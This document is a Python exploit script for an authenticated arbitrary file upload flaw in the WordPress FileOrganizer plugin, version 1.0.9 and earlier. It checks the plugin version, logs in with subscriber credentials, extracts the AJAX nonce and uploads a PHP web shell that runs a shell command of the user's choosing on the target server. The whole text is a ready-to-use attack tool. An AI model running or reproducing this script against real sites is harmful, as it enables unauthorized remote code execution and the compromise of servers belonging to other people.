import requests import re import argparse from bs4 import BeautifulSoup requests.packages.urllib3.disable_warnings() session = requests.Session() session.verify = False banner = """ '######::'##::::'##:'########:::::::::::'#######::::'#####::::'#######::'##:::::::::::::::::'########::'#######:::'#######::'########: '##... ##: ##:::: ##: ##.....:::::::::::'##.... ##::'##.. ##::'##.... ##: ##:::'##::::::::::: ##.. ##:'##.... ##:'##.... ##: ##.....:: ##:::..:: ##:::: ##: ##::::::::::::::::..::::: ##:'##:::: ##:..::::: ##: ##::: ##:::::::::::..:: ##::: ##:::: ##: ##:::: ##: ##::::::: ##::::::: ##:::: ##: ######:::'#######::'#######:: ##:::: ##::'#######:: ##::: ##::'#######:::: ##::::: ########:: #######:: #######:: ##:::::::. ##:: ##:: ##...::::........:'##:::::::: ##:::: ##:'##:::::::: #########:........::: ##::::::...... ##:'##.... ##:...... ##: ##::: ##::. ## ##::: ##:::::::::::::::: ##::::::::. ##:: ##:: ##::::::::...... ##::::::::::::: ##:::::'##:::: ##: ##:::: ##:'##::: ##: . ######::::. ###:::: ########:::::::::: #########::. #####::: #########::::::: ##::::::::::::: ##:::::. #######::. #######::. ######:: :......::::::...:::::........::::::::::By Nxploit Khaled_alenazi....:::::::::::..::::::::::::::..:::::::.......::::.......::::......::: """ parser = argparse.ArgumentParser(description="FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload by | Nxploit Khaled_alenazi") parser.add_argument("--url", required=True, help="Target WordPress site URL") parser.add_argument("--username", required=True, help="WordPress Username") parser.add_argument("--password", required=True, help="WordPress Password") parser.add_argument("--cmd", default="ls -la /", help="Command to execute in uploaded file") args = parser.parse_args() print(banner) def check_version(url): version_url = f"{url}/wp-content/plugins/fileorganizer/readme.txt" response = session.get(version_url, headers=headers, verify=False) if response.status_code == 200: version_match = re.search(r'Stable tag:\s*(\d+\.\d+\.\d+)', response.text) if version_match: version = version_match.group(1) if version <= "1.0.9": print(f"[+] Vulnerable version detected: {version}") return True print("[-] Target is not vulnerable or unreachable.") return False headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"} if not check_version(args.url): exit() login_url = f"{args.url}/wp-login.php" login_data = { "log": args.username, "pwd": args.password, "rememberme": "forever", "wp-submit": "Log In" } response = session.post(login_url, data=login_data, headers=headers) if any("wordpress_logged_in" in cookie.name for cookie in session.cookies): print("[+] Logged in successfully!") else: print("[-] Failed to log in. Check your credentials.") exit() admin_url = f"{args.url}/wp-admin/admin.php?page=fileorganizer" response = session.get(admin_url, headers=headers) soup = BeautifulSoup(response.text, 'html.parser') nonce_match = re.search(r'var fileorganizer_ajax_nonce = "(.*?)";', response.text) if nonce_match: nonce = nonce_match.group(1) print(f"[+] Extracted nonce: {nonce}") else: print("[-] Failed to extract nonce.") exit() exploit_url = f"{args.url}/wp-admin/admin-ajax.php" files = { "upload[]": ("cmd.php", f"' . shell_exec('{args.cmd}') . '';\n?>", "application/x-php") } data = { "reqid": "1950b7157c315a", "cmd": "upload", "target": "l1_d3AtY29udGVudA", "action": "fileorganizer_file_folder_manager", "fileorganizer_nonce": nonce, "mtime[]": "1738507656" } response = session.post(exploit_url, files=files, data=data, headers=headers) print("[+] Server Response:") print(response.status_code, response.reason) print(response.headers) print(response.text) if "cmd.php" in response.text: try: json_response = response.json() file_url = json_response['added'][0]['url'] print(f"[+] File uploaded successfully!") print(f"[+] Access file at: {file_url}") except Exception as e: print("[!] Error extracting file URL from response:", str(e)) else: print("[-] Upload failed!")